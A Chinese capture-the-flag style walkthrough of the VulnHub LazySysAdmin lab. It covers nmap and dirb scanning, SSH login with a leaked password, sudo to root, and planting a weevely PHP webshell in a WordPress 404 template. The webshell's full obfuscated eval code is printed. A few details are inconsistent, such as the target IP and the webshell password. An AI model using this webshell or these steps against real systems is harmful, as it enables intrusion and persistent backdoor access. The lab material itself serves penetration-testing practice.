下载地址:https://www.vulnhub.com/entry/lazysysadmin-1,205/
配置环境
kali Ip:192.168.87.128
靶机ip:192.168.87.174
一.信息收集
1.主机发现
由于是靶机环境,目标主机与本地在同一网段,使用nmap进行网段扫描,探测存活主机,由结果判断192.168.87.169看起来像目标主机ip。
nmap -sn 192.168.87.0/24
2.扫描主机
对主机进行各种端口扫描
nmap -A -T4 -O -p 0-65535 192.168.87.174
nmap -A 192.168.87.174//强力扫描,耗时长
nmap -O 192.168.87.174 //对目标主机的操作系统进行扫描
nmap 192.168.87.174 -p < portnumber > //对指定端口扫描
nmap -T4 指定扫描过程使用的时序,(总共6个级别[0-5]),级别越高,扫描速度越快,但容易被防火墙或IDS检测屏蔽掉)。
3.目录扫描
因为扫描出开放了80端口,证明有http服务,直接访问首页
使用dirb工具扫描
dirb http://192.168.87.174
扫描结果如下,发现有wordpress和phpmyadmin
二.漏洞利用
1.SSH
根据前面信息收集,发现了有一个smb服务,我们可以直接尝试连接smb://192.168.87.174,发现居然是网站的后台文件
发现了deets,txt
文件里面有秘密,密码12345
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
根据前面web服务扫描,发现了有wordpress,直接访问http://192.168.87.174/wordpress
,发现反复强调自己的名字是togie
,猜测ssh用户是togie密码是12345,尝试连接
ssh togie@192.168.87.174
连接成功
接下来就要提权,我们查看当前的togie是否可以sudo
sudo -l
发现可以,不废话直接sudo
sudo -i
这一阶段都接受了
前面在做信息收集的时候发现了数据库账户和密码,在wordpress文件夹里的wp-config.php里面
账户:Admin
密码:TogieMYSQL12345^^
直接登录phpmyadmin,发现什么用都没有
尝试登录wordpress
发现可以
使用kali自带的工具weevely,生成木马命令,在当前目录生成一个叫做wandan.php的文件密码为feile
weevely generate feile/wandan.php
<?php
$f='$k="F94b5a0303"F9;F9$kh="a2F9bbF9124683ca";F9F9$kf="7652fcbF967402";$pF9="y0pMF95k2l3vF9QitSJU";fF9F9unction x($F9F9t,$F';
$L='o.=$t{$iF9}^F9$k{$F9j};}}returF9n $oF9;}if F9(@pF9reg_match("F9/$kh(.+)F9$F9kf/",@file_geF9t_coF9ntF9ents("phF9p://inp';
$G='utF9"),$F9m)==1F9F9)F9 {@ob_start();@eF9val(@gzF9uF9ncoF9mpress(@x(@basF9eF964_decodF9e($m[1]F9),$F9k)F9));F9$o=@ob_ge';
$D='9k){$c=stF9rlen($k)F9;$F9l=strlenF9($t);$o="";fF9or(F9$i=0;$iF9<$F9l;){for($j=0;F9($j<$c&F9F9&$i<$F9l);$j+F9F9+,$i++){$';
$x='t_conF9tents();@obF9_end_F9cleaF9n();$r=@bF9ase64_encF9ode(@x(F9@gzF9compF9ress($o),$kF9));pF9riF9ntF9("$p$kh$r$kf");}';
$S=str_replace('Vq','','VqcreaVqtVqe_VqfuVqncVqtion');
$I=str_replace('F9','',$f.$D.$L.$G.$x);
$w=$S('',$I);$w();
?>
然后把文件内容代码复制Appearance>Editor>404 Templatesd,完成后点击updatefile
访问404文件,路径是/wordpress/wp-content/themes/twentyfifteen/404.php
,在kali里面输入如下命令来连接
weevely http://192.168.87.174/wordpress/wp-content/themes/twentyfifteen/404.php pass
至此,此次试验圆满完成!